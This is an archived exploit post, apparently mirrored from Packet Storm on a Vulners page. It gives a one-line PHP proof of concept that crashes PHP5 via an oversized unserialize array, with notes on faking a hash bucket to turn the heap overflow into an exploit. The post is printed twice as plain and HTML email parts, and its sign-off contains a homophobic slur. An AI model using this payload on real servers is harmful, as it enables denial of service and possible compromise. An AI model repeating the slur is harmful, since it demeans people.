Lucene search
+L

php5-unserialize.txt

🗓️ 20 Oct 2006 00:00:00Reported by slythersType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

PHP5 Unserialize Heap Overflow Exploi

Code
`------=_Part_91297_20240413.1161096528744  
Content-Type: text/plain; charset=ISO-8859-1; format=flowed  
Content-Transfer-Encoding: 7bit  
Content-Disposition: inline  
  
<?  
  
print_r(unserialize('a:1073741823:{i:0;s:30:"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"}'));  
?>  
  
in function zend_hash_init() int overflow ( ecalloc() )-> heap overflow  
here segfault in zend_hash_find() but it's possible to fake the bucket and  
exploit a zend_hash_del_index_or_key  
i tried a memory dump , just fake the bucked with the pointer of the  
$GLOBALS's bucket but segfault before in memory_shutdown...  
  
don't cry a river :P  
ethic is for gayz  
  
------=_Part_91297_20240413.1161096528744  
Content-Type: text/html; charset=ISO-8859-1  
Content-Transfer-Encoding: 7bit  
Content-Disposition: inline  
  
<?<br>&nbsp;&nbsp; &nbsp;print_r(unserialize('a:1073741823:{i:0;s:30:"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"}'));<br>?><br><br>in function zend_hash_init() int overflow ( ecalloc() )-> heap overflow<br>here segfault in zend_hash_find() but it's possible to fake the bucket and exploit a zend_hash_del_index_or_key  
<br>i tried a memory dump , just fake the bucked with the pointer of the $GLOBALS's bucket but segfault before in memory_shutdown...<br><br>don't cry a river :P<br>ethic is for gayz<br><br>  
  
------=_Part_91297_20240413.1161096528744--  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Oct 2006 00:00Current
20